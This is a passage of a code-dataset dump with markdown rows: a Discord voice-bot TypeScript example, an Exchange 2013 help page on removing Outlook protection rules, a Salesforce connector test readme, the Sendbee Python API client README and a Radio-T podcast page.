hexsha
stringlengths 40
40
| size
int64 5
1.04M
| ext
stringclasses 6
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
344
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
11
| max_stars_count
int64 1
368k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
344
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
11
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
344
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
11
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
1.04M
| avg_line_length
float64 1.14
851k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
| lid
stringclasses 191
values | lid_prob
float64 0.01
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
61b2ffb66a8ae5e72d7c5a212a1e0c5176c9924b | 3,324 | md | Markdown | examples/basic_player/ts_example.md | tr1ckydev/discord-play | 203d2ab9aa578f8bda3b4120fe2830ca82cda344 | [
"MIT"
] | 6 | 2021-09-09T16:38:53.000Z | 2021-11-26T09:56:16.000Z | examples/basic_player/ts_example.md | tr1ckydev/discord-play | 203d2ab9aa578f8bda3b4120fe2830ca82cda344 | [
"MIT"
] | 3 | 2021-09-09T16:40:01.000Z | 2021-10-15T10:24:28.000Z | examples/basic_player/ts_example.md | tr1ckydev/discord-play | 203d2ab9aa578f8bda3b4120fe2830ca82cda344 | [
"MIT"
] | 2 | 2021-09-13T10:00:33.000Z | 2021-11-10T21:02:57.000Z | ```tsx
import { Client, Intents, Message } from 'discord.js';
import { DisPlayConnection, DisPlayEvent, DisPlayPlayer } from 'discord-play';
const client: Client = new Client({
intents: [
Intents.FLAGS.GUILDS,
Intents.FLAGS.GUILD_MESSAGES,
Intents.FLAGS.GUILD_VOICE_STATES
]
});
client.once('ready', () => console.log('Ready!'));
interface Command {
name: string,
args: string[]
}
let connection: DisPlayConnection, player: DisPlayPlayer;
client.on('messageCreate', async (message: Message) => {
const command: Command = parseCommand(message.content);
switch (command.name) {
case "?join": {
if (connection) { message.reply("Already joined a voice channel."); return; }
connection = new DisPlayConnection(message.member.voice);
player = new DisPlayPlayer(message.guild.id);
player.on(DisPlayEvent.BUFFERING, (oldState, newState) => {
message.channel.send("Loading resource");
});
player.on(DisPlayEvent.PLAYING, (oldState, newState) => {
message.channel.send("Started playing");
});
player.on(DisPlayEvent.FINISH, (oldState, newState) => {
message.channel.send("Finished playing");
});
player.on('error', error => {
message.channel.send("Error");
console.log(error);
});
break;
}
case "?play": {
player.play('./sample.mp3');
/* You can also pass an online audio link too.
* `player.play(command.args[0]);`
* (e.g. `?play www.sample.com/media/audio.mp3`)
*
* There is an issue currently with ffmpeg-static, ONLY not
* being able to play online audio links, rest works fine.
* If you really want to play online audio links,
* install original `ffmpeg` globally in your system instead
* of static version.
*/
break;
}
case "?mute": {
if (!connection) { message.reply("No connection found"); return; }
await connection.toggleMute();
message.reply("Mute toggled");
break;
}
case "?deafen": {
if (!connection) { message.reply("No connection found"); return; }
await connection.toggleDeafen();
message.channel.send("Deafen toggled.");
break;
}
case "?leave": {
if (!connection) { message.reply("No connection found"); return; }
try {
await connection.destroy();
message.reply("Left voice channel");
} catch {
message.channel.send("No connection found");
}
break;
}
case "?getreport": {
message.reply(`\`\`\`js
${connection.getDependancies()}
\`\`\``);
// It will return you the ffmpeg version along with other dependancies.
}
}
});
client.login("your-bot-token-here");
function parseCommand(content: string): Command {
const args: string[] = content.split(' ');
const name: string = args.shift();
return { name, args };
}
```
| 31.657143 | 89 | 0.540915 | eng_Latn | 0.74884 |
61b304c0136f41a0342f7be6c5fcd2f84bb36c0c | 3,152 | md | Markdown | Exchange/ExchangeServer2013/remove-an-outlook-protection-rule-exchange-2013-help.md | M34U2NV/OfficeDocs-Exchange | ed7614bed4ac2f88829d12bd337f0284b09333de | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-06-30T11:06:58.000Z | 2021-06-30T11:06:58.000Z | Exchange/ExchangeServer2013/remove-an-outlook-protection-rule-exchange-2013-help.md | M34U2NV/OfficeDocs-Exchange | ed7614bed4ac2f88829d12bd337f0284b09333de | [
"CC-BY-4.0",
"MIT"
] | null | null | null | Exchange/ExchangeServer2013/remove-an-outlook-protection-rule-exchange-2013-help.md | M34U2NV/OfficeDocs-Exchange | ed7614bed4ac2f88829d12bd337f0284b09333de | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-04-15T18:25:37.000Z | 2021-04-15T18:25:37.000Z | ---
title: 'Remove an Outlook Protection Rule: Exchange 2013 Help'
TOCTitle: Remove an Outlook Protection Rule
ms:assetid: 569fc3be-b269-43f5-8797-73ab0691e685
ms:mtpsurl: https://technet.microsoft.com/library/Ee633467(v=EXCHG.150)
ms:contentKeyID: 49319914
ms.reviewer:
manager: serdars
ms.author: dmaguire
author: msdmaguire
f1.keywords:
- NOCSH
mtps_version: v=EXCHG.150
---
# Remove an Outlook Protection Rule
_**Applies to:** Exchange Server 2013_
Using Microsoft Outlook protection rules, you can protect messages with Information Rights Management (IRM) by applying an [Active Directory Rights Management Services (AD RMS)](/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/hh831364(v=ws.11)x) template in Outlook 2010 before the messages are sent. To prevent an Outlook protection rule from being applied, you can disable the rule. Removing an Outlook protection rule removes the rule definition from Active Directory.
For additional management tasks related to IRM, see [Information Rights Management procedures](information-rights-management-procedures-exchange-2013-help.md).
## What do you need to know before you begin?
- Estimated time to completion: 1 minute.
- You need to be assigned permissions before you can perform this procedure or procedures. To see what permissions you need, see the "Rights protection" entry in the [Messaging policy and compliance permissions](messaging-policy-and-compliance-permissions-exchange-2013-help.md) topic.
- You can't use the Exchange admin center (EAC) to remove Outlook protection rules. You must use the Shell.
- For information about keyboard shortcuts that may apply to the procedures in this topic, see [Keyboard shortcuts in the Exchange admin center](keyboard-shortcuts-in-the-exchange-admin-center-2013-help.md).
> [!TIP]
> Having problems? Ask for help in the Exchange forums. Visit the forums at [Exchange Server](https://social.technet.microsoft.com/forums/office/home?category=exchangeserver).
## Use the Shell to remove an Outlook protection rule
This example removes the Outlook protection rule OPR-DG-Finance.
```powershell
Remove-OutlookProtectionRule -Identity "OPR-DG-Finance"
```
For detailed syntax and parameter information, see [Remove-OutlookProtectionRule](/powershell/module/exchange/Remove-OutlookProtectionRule).
## Use the Shell to remove all Outlook protection rules
This example removes all Outlook protection rules in the Exchange organization.
```powershell
Get-OutlookProtectionRule | Remove-OutlookProtectionRule
```
For detailed syntax and parameter information, see [Get-OutlookProtectionRule](/powershell/module/exchange/Get-OutlookProtectionRule) and [Remove-OutlookProtectionRule](/powershell/module/exchange/Remove-OutlookProtectionRule).
## How do you know this worked?
To verify that you have successfully removed an Outlook protection rule, use the [Get-OutlookProtectionRule](/powershell/module/exchange/Get-OutlookProtectionRule) cmdlet to retrieve Outlook protection rules. For an example of how to retrieve Outlook protection rules, see [Examples](/powershell/module/exchange/Get-OutlookProtectionRule#examples). | 53.423729 | 489 | 0.808058 | eng_Latn | 0.911279 |
61b3f662fe61c2a94edd32080b7b7c6351147f41 | 3,801 | md | Markdown | sfdc37/tests/Readme.md | pramodya1994/module-salesforce | a6f7cea63202adc5dd8546f3c656a542090c1417 | [
"Apache-2.0"
] | null | null | null | sfdc37/tests/Readme.md | pramodya1994/module-salesforce | a6f7cea63202adc5dd8546f3c656a542090c1417 | [
"Apache-2.0"
] | null | null | null | sfdc37/tests/Readme.md | pramodya1994/module-salesforce | a6f7cea63202adc5dd8546f3c656a542090c1417 | [
"Apache-2.0"
] | null | null | null | ## Compatibility
| Ballerina Version | API Version |
| ------------------ | ------------ |
| 0.991.0 | v37.0 |
### Prerequisites
Create a Salesforce developer account and create a connected app by visiting [Salesforce](https://www.salesforce.com) and obtain the following parameters:
* Base URl (Endpoint)
* Client Id
* Client Secret
* Access Token
* Refresh Token
* Refresh URL
IMPORTANT: This access token and refresh token can be used to make API requests on your own account's behalf.
Do not share your access token, client secret with anyone.
Create an external id field under "Account" SObject, named with `"SF_ExternalID__c"` in your connected app.
This field will be used in the test cases related with external id.
Visit [here](https://help.salesforce.com/articleView?id=remoteaccess_authenticate_overview.htm) for more information on obtaining OAuth2 credentials.
### Working with Salesforce REST endpoint.
In order to use the Salesforce endpoint, first you need to create a
Salesforce Client endpoint by passing above mentioned parameters.
Find the way of creating Salesforce endpoint as following.
```ballerina
sfdc37:SalesforceConfiguration salesforceConfig = {
baseUrl: endpointUrl,
clientConfig: {
auth: {
scheme: http:OAUTH2,
config: {
grantType: http:DIRECT_TOKEN,
config: {
accessToken: accessToken,
refreshConfig: {
refreshUrl: refreshUrl,
refreshToken: refreshToken,
clientId: clientId,
clientSecret: clientSecret
}
}
}
}
}
};
sfdc37:Client salesforceClient = new(salesforceConfig);
```
#### Running salesforce tests
Create `ballerina.conf` file in `module-salesforce`, with following keys:
* ENDPOINT
* ACCESS_TOKEN
* CLIENT_ID
* CLIENT_SECRET
* REFRESH_TOKEN
* REFRESH_URL
Assign relevant string values generated for Salesforce app.
Go inside `module-salesforce` and give the command `ballerina init`using terminal and run test.bal file
using `ballerina test sfdc37 --config ballerina.conf` command.
* Sample Test Function
```ballerina
@test:Config
function testGetResourcesByApiVersion() {
log:printInfo("salesforceClient -> getResourcesByApiVersion()");
string apiVersion = "v37.0";
json|SalesforceConnectorError response = salesforceClient->getResourcesByApiVersion(apiVersion);
if (response is json) {
test:assertNotEquals(response, null, msg = "Found null JSON response!");
test:assertNotEquals(response["sobjects"], null);
test:assertNotEquals(response["search"], null);
test:assertNotEquals(response["query"], null);
test:assertNotEquals(response["licensing"], null);
test:assertNotEquals(response["connect"], null);
test:assertNotEquals(response["tooling"], null);
test:assertNotEquals(response["chatter"], null);
test:assertNotEquals(response["recent"], null);
} else {
test:assertFail(msg = response.message);
}
}
```
* Sample Result
```ballerina
---------------------------------------------------------------------------
T E S T S
---------------------------------------------------------------------------
---------------------------------------------------------------------------
Running Tests of module: sfdc37
---------------------------------------------------------------------------
...
2018-04-13 13:35:19,154 INFO [sfdc37] - salesforceClient -> getResourcesByApiVersion()
...
sfdc37............................................................. SUCCESS
---------------------------------------------------------------------------
```
| 34.243243 | 154 | 0.594843 | eng_Latn | 0.613802 |
61b444310792e03175eba94aaa6a56de0e18ae37 | 18,231 | md | Markdown | README.md | sendbee/sendbee-python-client | 20f27b733afb1f5143f0f604729f82158c584162 | [
"MIT"
] | null | null | null | README.md | sendbee/sendbee-python-client | 20f27b733afb1f5143f0f604729f82158c584162 | [
"MIT"
] | null | null | null | README.md | sendbee/sendbee-python-client | 20f27b733afb1f5143f0f604729f82158c584162 | [
"MIT"
] | null | null | null | # Sendbee Python API Client
```
.' '. __
. . . (__\_
. . . -{{_(|8)
' . . ' ' . . ' (__/
```
[](https://badge.fury.io/py/sendbee-api)
[](https://travis-ci.org/sendbee/sendbee-python-api-client)






## Table of contents
- [Installation](#installation)
- [Initialization](#initialization)
#### Contacts
- [Fetch contacts](#fetch-contacts)
- [Subscribe contact](#subscribe-contact)
- [Update contact](#update-contact)
#### Contact Tags
- [Fetch contact tags](#fetch-contact-tags)
- [Create contact tag](#create-contact-tag)
- [Update contact tag](#update-contact-tag)
- [Delete contact tag](#delete-contact-tag)
#### Contact Fields
- [Fetch contact fields](#fetch-contact-fields)
- [Create contact field](#create-contact-field)
- [Update contact field](#update-contact-field)
- [Delete contact field](#delete-contact-field)
#### Conversations
- [Fetch conversations](#fetch-conversations)
- [Fetch conversation messages](#fetch-conversation-mesages)
- [Fetch message templates](#fetch-message-templates)
- [Send template message](#send-template-message)
- [Send message](#send-message)
#### Teams
- [Fetch teams](#fetch-teams)
- [Fetch team members](#fetch-team-members)
#### Automation
- [Managing chatbot (automated responses) status settings](#bot-on-off)
- [Get chatbot (automated responses) status](#bot-status)
#### Mics
- [Pagination](#pagination)
- [API Rate Limit](#api-rate-limit)
- [Raw response](#raw-response)
- [Exception handling](#exception-handling)
- [Authenticate webhook request](#authenticate-webhook-request)
- [Warnings](#warnings)
- [Debugging](#debugging)
- [Official Documentation](http://developer.sendbee.io)
### <a href='#installation'>Installation</a>
```bash
> pip install sendbee-api
```
### <a href='#initialization'>Initialization</a>
```python
from sendbee_api import SendbeeApi
api = SendbeeApi('__your_api_key_here__', '__your_secret_key_here__')
```
## Contacts
### <a href='#fetch-contacts'>Fetch contacts</a>
```python
contacts = api.contacts(
[tags=['...', ...]], [status='subscribed|unsubscribed'],
[search_query='...'], [page=...], [limit=...]
)
for contact in contacts:
contact.id
contact.status
contact.folder
contact.created_at
contact.name
contact.phone
for tag in contact.tags:
tag.id
tag.name
for note in contact.notes:
note.value
for contact_field in contact.contact_fields:
contact_field.key
contact_field.value
```
### <a href='#subscribe-contact'>Subscribe contact</a>
```python
contact = api.subscribe_contact(
phone='+...',
# this is mandatory the most important information
# about the subscribing contact
[tags=['...', ...]],
# tag new contact
# if tag doesn't exist, it will be created
[name='...'],
[notes=[...]],
# write notes about your new subscriber
[contact_fields={'__field_name__': '__field_value__', ...}],
# fill contact fields with your data (value part)
# contact fields must be pre-created in Sendbee Dashboard
# any non-existent field will be ignored
[block_notifications=[True|False]],
# prevent sending browser push notification and email
# notification to agents, when new contact subscribes
# (default is True)
[block_automation=[True|False]]
# prevent sending automated template messages to newly
# subscribed contact (if any is set in Sendbee Dashboard)
# (default is True)
)
contact.id
contact.status
contact.folder
contact.created_at
contact.name
contact.phone
for tag in contact.tags:
tag.id
tag.name
for note in contact.notes:
note.value
for contact_field in contact.contact_fields:
contact_field.key
contact_field.value
```
### <a href='#update-contact'>Update contact</a>
```python
contact = api.update_contact(
id='...',
# contact is identified with ID
[phone='+...'],
# this is the most important information
# about the subscribing contact
[tags=['...', ...]],
# tag new contact
# if tag doesn't exist, it will be created
[name='...'],
[notes=[...]],
# write notes about your new subscriber
# if there are notes already saved for this contact
# new notes will be appended
[contact_fields={'__field_name__': '__field_value__', ...}],
# fill contact fields with your data (value part)
# contact fields must be pre-created in Sendbee Dashboard
# any non-existent field will be ignored
# if there are fields already filled with data for this contact
# it will be overwritten with new data
)
contact.id
contact.status
contact.folder
contact.created_at
contact.name
contact.phone
for tag in contact.tags:
tag.id
tag.name
for note in contact.notes:
note.value
for contact_field in contact.contact_fields:
contact_field.key
contact_field.value
```
## Contact tags
### <a href='#fetch-contact-tags'>Fetch contact tags</a>
```python
tags = api.tags([name='...'], [page=...], [limit=...])
for tag in tags:
tag.id
tag.name
```
### <a href='#create-contact-tag'>Create contact tag</a>
```python
tag = api.create_tag(name='...')
tag.id
tag.name
```
### <a href='#update-contact-tag'>Update contact tag</a>
```python
tag = api.update_tag(id='...', name='...')
tag.id
tag.name
```
### <a href='#delete-contact-tag'>Delete contact tag</a>
```python
response = api.delete_tag(id='...')
response.message
```
## Contact fields
### <a href='#fetch-contact-fields'>Fetch contact fields</a>
```python
contact_fields = api.contact_fields([search_query='...'], [page=...], [limit=...])
for contact_field in contact_fields:
contact_field.name
contact_field.type
if contact_field.type == 'list':
contact_field.options
```
### <a href='#create-contact-field'>Create contact field</a>
If a contact field type is a list, then you need to send a list options.
List options is a list of option names: `['option1', 'option2', ...]`
```python
contact_field = api.create_contact_field(
name='...', type='text|number|list|date|boolean',
[options=['...'. ...]] # if contact field type is list
)
contact_field.id
contact_field.name
contact_field.type
if contact_field.type == 'list':
contact_field.options
```
### <a href='#update-contact-field'>Update contact field</a>
If a contact field type is a list, then you need to send a list options.
List options is a list of option names: `['option1', 'option2', ...]`
```python
contact_field = api.update_contact_field(
id='...', [name='...'], [type='text|number|list|date|boolean'],
[options=['...'. ...]] # if contact field type is list
)
contact_field.id
contact_field.name
contact_field.type
if contact_field.type == 'list':
contact_field.options
```
### <a href='#delete-contact-field'>Delete contact field</a>
```python
response = api.delete_contact_field(id='...')
response.message
```
## Conversations
### <a href='#fetch-conversations'>Fetch conversations</a>
```python
conversations = api.conversations(
[folder='open|done|spam|notified'], [search_query='...'],
[page=...], [limit=...], [date_from=__timestamp__], [date_to=__timestamp__]
)
for conversation in conversations:
conversation.id
conversation.folder
conversation.chatbot_active
conversation.platform
conversation.created_at
conversation.contact.id
conversation.contact.name
conversation.contact.phone
conversation.last_message.direction
conversation.last_message.status
conversation.last_message.inbound_sent_at
conversation.last_message.outbound_sent_at
```
### <a href='#fetch-conversation-messages'>Fetch conversation messages</a>
```python
messages = api.messages(conversation_id='...', [page=...])
for message in messages:
message.body
message.media_type
message.media_url
message.status
message.direction
message.sent_at
```
### <a href='#fetch-message-templates'>Fetch message templates</a>
Message templates must first be sent for approval.
Therefor every message template could have following status: `pending`, `approved`, `rejected`
If message template comms with `rejected` status, it also comes with `rejected_reason`.
```python
templates = api.message_templates(
[status="pending|approved|rejected"], [search_query='...'],
[page=...], [limit=...]
)
for template in templates:
template.id
template.text
template.buttons # available for all Sendbee users onboarded after 11th of December 2020
template.button_tags # available for all Sendbee users onboarded after 11th of December 2020
template.tags
template.keyword
template.language
template.status
template.rejected_reason
```
### <a href='#send-template-message'>Send template message</a>
Message template can be purely textual or textual with attachment.
If it is with attachment, that means you can send image, video or document URL together with text.
When you get a list of message templates, every template in that list has `attachment` field with it's value.
Attachment field value defines which type of attachment can be sent with message template:
Value | Description
--------- | -------
image | Message template can be sent with image URL: JPG/JPEG, PNG
video | Message template can be sent with video URL: MP4, 3GPP
document | Message template can be sent with document URL: PDF, DOC, DOCX, PPT, PPTX, XLS, XLSX
null | Message template does not support attachment URL
```python
response = api.send_template_message(
phone='+...',
template_keyword='...',
# every pre-created and approved message template
# is identified with a keyword
language='...',
# language keyword
# example: en (for english)
tags={'__tag_key__': '__tag_value__', ...},
# tags for template messages are parts of the message that need
# to be filled with your custom data
# example:
# template message: "Welcome {{1}}! How can we help you?"
# tags: {"1": "John"}
# Learn more: https://developer.sendbee.io/#send-message-template
button_tags={'__tag_key__': '__tag_value__', ...}
# tags for call-to-action button with dynamic URL suffix that need
# to be filled with your custom data
# example:
# template message: https://example.com/{{1}}
# tags: {"1": "page/123"}
[prevent_bot_off=True|False],
# if set to True, will prevent turning-off chatbot for the conversation
# default system behaviour is that chatbot is turned-off
[attachment='http...']
)
response.status
response.conversation_id
response.message_id
# save this id, and when you get sent message status requests on
# your webhook, you'll get this same id to identify the conversation
```
### <a href='#send-message'>Send message</a>
You can send either text message or media message.
For media message, following formats are supported:
Category | Formats
-------- | -------
Audio | AAC, M4A, AMR, MP3, OGG OPUS
Video | MP4, 3GPP
Image | JPG/JPEG, PNG
Document | PDF, DOC, DOCX, PPT, PPTX, XLS, XLSX
```python
response = api.send_message(
phone='+...',
[text='...'],
# any kind of message text
[media_url='...'],
# URL to a media.
# you need to upload it your self and send us the URL
[prevent_bot_off=True|False]
# if set to True, will prevent turning-off chatbot for the conversation
# default system behaviour is that chatbot is turned-off
)
response.status
response.conversation_id
response.message_id
# save this id, and when you get sent message status requests on
# your webhook, you'll get this same id to identify the conversation
```
## Teams
### <a href='#fetch-teams'>Fetch teams</a>
```python
teams = api.teams([member_id='...'])
for team in teams:
team.id
team.name
for member in team.members:
member.id
member.name
member.role
member.online
member.available
```
### <a href='#fetch-team-members'>Fetch team members</a>
```python
members = api.members([team_id='...'])
for member in members:
member.id
member.name
member.role
member.online
member.available
for team in member.teams:
team.id
team.name
```
## Automation
### <a href='#bot-on-off'>Managing chatbot (automated responses) status settings</a>
Every contact is linked to a conversation with an agent.
Conversation could be handled by an agent or a chatbot (automated responses).
Every time a message has been sent to a contact by an agent or using the API,
the chatbot will automatically be turned off for that conversation -
except when you set 'prevent_bot_off' to true via API call (see [Send message](#send-message)).
Use the example below to change the chatbot status based on your use case.
```python
api.chatbot_activity(conversation_id='...', active=True|False)
```
### <a href='#bot-status'>Get chatbot (automated responses) status</a>
You can also check if chatbot is turned on or off for a conversation.
```python
response = api.chatbot_activity_status(conversation_id='...')
response.conversation_id
response.chatbot_active # True/False
```
## Misc
### <a href='#pagination'>Pagination</a>
You can paginate on every endpoint/method where a list of something is fetching.
Wherever you see `[page=...]` it means you can paginate like `page=2`, `page=3`, etc. The best way to do that is to use `.next_page()` method.
There are two ways to detect that pagination ended, using `PaginationException` and using `.has_next()` method.
> Paginate using .next_page() and PaginationException:
```python
from sendbee_api import PaginationException
messages = api.messages(conversation_id='...') # first page
while True:
try:
messages = api.messages(
conversation_id='...', page=messages.next_page()
)
except PaginationException as e:
break
```
> Paginate using .next_page() and .has_next() methods:
```python
messages = api.messages(conversation_id='...') # first page
while True:
if not messages.has_next():
break
messages = api.messages(
conversation_id='...', page=messages.next_page()
)
```
### <a href='#api-rate-limit'>API Rate Limit</a>
A rate limit is the number of API calls a business number can make
within a given time period. If this limit is exceeded,
API requests are throttled, and will fail with 429 error response.
No matter how many API keys you make in your Sendbee account,
rate limit will always be counted within a business number.
```python
from sendbee_api import SendbeeRequestApiException
try:
api.rate_limit_request_test()
except SendbeeRequestApiException as ex:
retry_after = ex.response.headers.get('Retry-After')
```
### <a href='#raw-response'>Raw response</a>
If you prefer to deal with the raw server response, response string is available under raw_data
```python
from sendbee_api import SendbeeApi
api = SendbeeApi('__your_api_key_here__', '__your_secret_key_here__')
response = api.contacts()
print(response.raw_data)
```
### <a href='#exception-handling'>Exception handling</a>
Every time something is not as it should be, like parameter is missing, parameter value is invalid, authentication fails, etc, API returns a http status code accordingly and an error message.
By using this client library, an error message is detected and taken, and an exception is raised, so you can handle it like this:
```python
from sendbee_api import SendbeeRequestApiException
try:
api.send_template_message(...)
except SendbeeRequestApiException as e:
# handle exception
```
### <a href='#authenticate-webhook-request'>Authenticate webhook request</a>
After activating your webhook URL in Sendbee Dashboard, we will start sending requests on that URL depending on which webhook type is linked with that webhook URL.
Every request that we make will have authorization token in header, like this:
```
{
...
'X-Authorization': '__auth_token_here__',
...
}
```
To authenticate requests that we make to your webhook URL, take this token from request header and check it using Sendbee API Client:
```python
from sendbee_api import SendbeeApi
api = SendbeeApi('__your_api_key_here__', '__your_secret_key_here__')
token = '...' # taken from the request header
if not api.auth.check_auth_token(token):
# error! authentication failed!
```
### <a href='#warnings'>Warnings</a>
Sometimes APi returns a worning so you could be warned about something.
The waning is displayed in standard output:

### <a href='#debugging'>Debugging</a>
This library has it's own internal debugging tool.
By default it is disabled, and to enable it, pass the `debug` parameter:
```python
from sendbee_api import SendbeeApi
api = SendbeeApi(
'__your_api_key_here__', '__your_secret_key_here__', debug=True
)
```
Once you enabled the internal debug tool, every request to API will output various request and response data in standard output:

| 27.048961 | 193 | 0.686139 | eng_Latn | 0.893065 |
61b48290009401590d4ad1767a07b901ef3a3144 | 591 | md | Markdown | README.md | BrianLiterachu/mafia-clone | bce50a16bc9d0f942f012b6f9da20994708b8166 | [
"0BSD"
] | null | null | null | README.md | BrianLiterachu/mafia-clone | bce50a16bc9d0f942f012b6f9da20994708b8166 | [
"0BSD"
] | null | null | null | README.md | BrianLiterachu/mafia-clone | bce50a16bc9d0f942f012b6f9da20994708b8166 | [
"0BSD"
] | null | null | null | # Mafia Bot - Clone File
An open-source moderation, action bot written in JavaScript
# Requirements
__NodeJS__
*__Window: https://nodejs.org/en/download__*
# Start
```
Step 1: Download the repository
Step 1.2: Replace process.env.token to your Discord Bot Token
Step 2: Go to the Command Prompt for Windows
cd /Path/To/The Repository
Step 3: Install all the dependencies
npm install
The final step: Run the bot
node index.js
About Us
```
# * Owner:
```
TwitchyJam (Christensen)
[NTU] Shieru
```
# * Contributor, Support:
```# JustAPie
# Monsieur Andy (Ishigami Kaito)
```
| 12.847826 | 61 | 0.717428 | eng_Latn | 0.403474 |
61b537a19a220741a036382da6a18993de6a1510 | 139 | md | Markdown | ml/src/main/scala/com/github/cloudml/zen/ml/recommendation/README.md | titsuki/zen | 5178cedc43ace9325c067f90110cd2d497a11afb | [
"Apache-2.0"
] | 199 | 2015-04-10T03:22:46.000Z | 2021-02-26T07:40:21.000Z | ml/src/main/scala/com/github/cloudml/zen/ml/recommendation/README.md | titsuki/zen | 5178cedc43ace9325c067f90110cd2d497a11afb | [
"Apache-2.0"
] | 53 | 2015-04-10T14:33:30.000Z | 2018-11-17T15:03:20.000Z | ml/src/main/scala/com/github/cloudml/zen/ml/recommendation/README.md | titsuki/zen | 5178cedc43ace9325c067f90110cd2d497a11afb | [
"Apache-2.0"
] | 82 | 2015-04-09T02:31:37.000Z | 2019-09-13T22:36:44.000Z | # Factorization Machines
## Road map
* Support hundereds billions of features
* Support online learning
* Support TBs training data
| 13.9 | 41 | 0.755396 | eng_Latn | 0.936238 |
61b55bc6449c2338690205cd2d52934203200f9e | 1,239 | md | Markdown | docs/framework/wcf/diagnostics/tracing/microsoft-transactions-transactionbridge-createtransactionfailure.md | yunuskorkmaz/docs.tr-tr | e73dea6e171ca23e56c399c55e586a61d5814601 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/wcf/diagnostics/tracing/microsoft-transactions-transactionbridge-createtransactionfailure.md | yunuskorkmaz/docs.tr-tr | e73dea6e171ca23e56c399c55e586a61d5814601 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/wcf/diagnostics/tracing/microsoft-transactions-transactionbridge-createtransactionfailure.md | yunuskorkmaz/docs.tr-tr | e73dea6e171ca23e56c399c55e586a61d5814601 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
description: 'Hakkında daha fazla bilgi edinin: Microsoft. Transactions. TransactionBridge. CreateTransactionFailure'
title: Microsoft.Transactions.TransactionBridge.CreateTransactionFailure
ms.date: 03/30/2017
ms.assetid: c3468e23-49a9-4a84-972d-a79a658851b3
ms.openlocfilehash: 6b4a071b617de475b51ec50178e5205fa2e524d2
ms.sourcegitcommit: ddf7edb67715a5b9a45e3dd44536dabc153c1de0
ms.translationtype: MT
ms.contentlocale: tr-TR
ms.lasthandoff: 02/06/2021
ms.locfileid: "99803314"
---
# <a name="microsofttransactionstransactionbridgecreatetransactionfailure"></a>Microsoft.Transactions.TransactionBridge.CreateTransactionFailure
İşlem oluşturulamadı.
## <a name="description"></a>Description
Bu izleme, MSDTC tarafından bir işlem oluşturulmadığı zaman üretilir. Bu, düşük kaynak, yetersiz günlük alanı veya diğer hatalardan kaynaklanabilir.
## <a name="troubleshooting"></a>Sorun giderme
İşlem yapılabilir herhangi bir öğenin mevcut olup olmadığını öğrenmek için izleme iletisindeki durum dizesini inceleyin.
## <a name="see-also"></a>Ayrıca bkz.
- [İzleme](index.md)
- [Uygulamanızda Sorun Giderme için İzleme Kullanma](using-tracing-to-troubleshoot-your-application.md)
- [Yönetim ve tanılama](../index.md)
| 41.3 | 151 | 0.807103 | tur_Latn | 0.978504 |
61b562e93aef853af58796f999e55efce93854d9 | 1,198 | md | Markdown | hugo/content/posts/podcast-140.md | zsxoff/radio-t-site | 08e1f661086e6ba8dd42fa6a310a1983eb48373b | [
"MIT"
] | 96 | 2018-04-06T19:42:00.000Z | 2022-03-20T10:54:51.000Z | hugo/content/posts/podcast-140.md | zsxoff/radio-t-site | 08e1f661086e6ba8dd42fa6a310a1983eb48373b | [
"MIT"
] | 140 | 2018-04-06T18:36:48.000Z | 2022-02-26T10:47:15.000Z | hugo/content/posts/podcast-140.md | zsxoff/radio-t-site | 08e1f661086e6ba8dd42fa6a310a1983eb48373b | [
"MIT"
] | 94 | 2018-04-07T16:35:54.000Z | 2022-03-26T22:51:05.000Z | +++
title = "Радио-Т 140"
date = "2009-06-14T08:00:00"
categories = [ "podcast",]
filename = "rt_podcast140"
image = "https://radio-t.com/images/radio-t/rt140.jpg"
+++

- Выход блестящей версии [Fedora 11](http://www.engadget.com/2009/06/09/fedora-11-packs-a-next-gen-file-system-faster-boot-times-all-t/)
- Праздник файловых систем нового [2.6.30](http://www.linux.org.ru/view-message.jsp?msgid=3775397)
- Новый [iPhone](http://macradar.ru/events/wwdc-2009-iphone/) хорош, как и старый
- Линейка [ноутбуков](http://macradar.ru/events/wwdc-2009-macbook-pro/) почти без изменений
- [Снежный барс](http://macradar.ru/events/wwdc-2009-1/) еще не прыгнул
- Google сделает [Exchange](http://www.infoq.com/news/2009/06/Google-App-Outlook-Plug-in) без Exchange
- [WordPress 2.8](http://habrahabr.ru/blogs/wordpress/61850/) уже тут
- Конец [аналогового](http://culture.compulenta.ru/432636/) ТВ в отдельно взятой стране
- [Яндекс](http://internetno.net/2009/06/10/narod/) лицом к “народу”
[Аудио](https://archive.rucast.net/radio-t/media/rt_podcast140.mp3)
<audio src="https://archive.rucast.net/radio-t/media/rt_podcast140.mp3" preload="none"></audio>
| 49.916667 | 136 | 0.732053 | yue_Hant | 0.083003 |
61b57d00f9eba5e9673cec08d879b536694da938 | 239 | md | Markdown | src/__tests__/fixtures/unfoldingWord/en_tq/hab/03/13.md | unfoldingWord/content-checker | 7b4ca10b94b834d2795ec46c243318089cc9110e | [
"MIT"
] | null | null | null | src/__tests__/fixtures/unfoldingWord/en_tq/hab/03/13.md | unfoldingWord/content-checker | 7b4ca10b94b834d2795ec46c243318089cc9110e | [
"MIT"
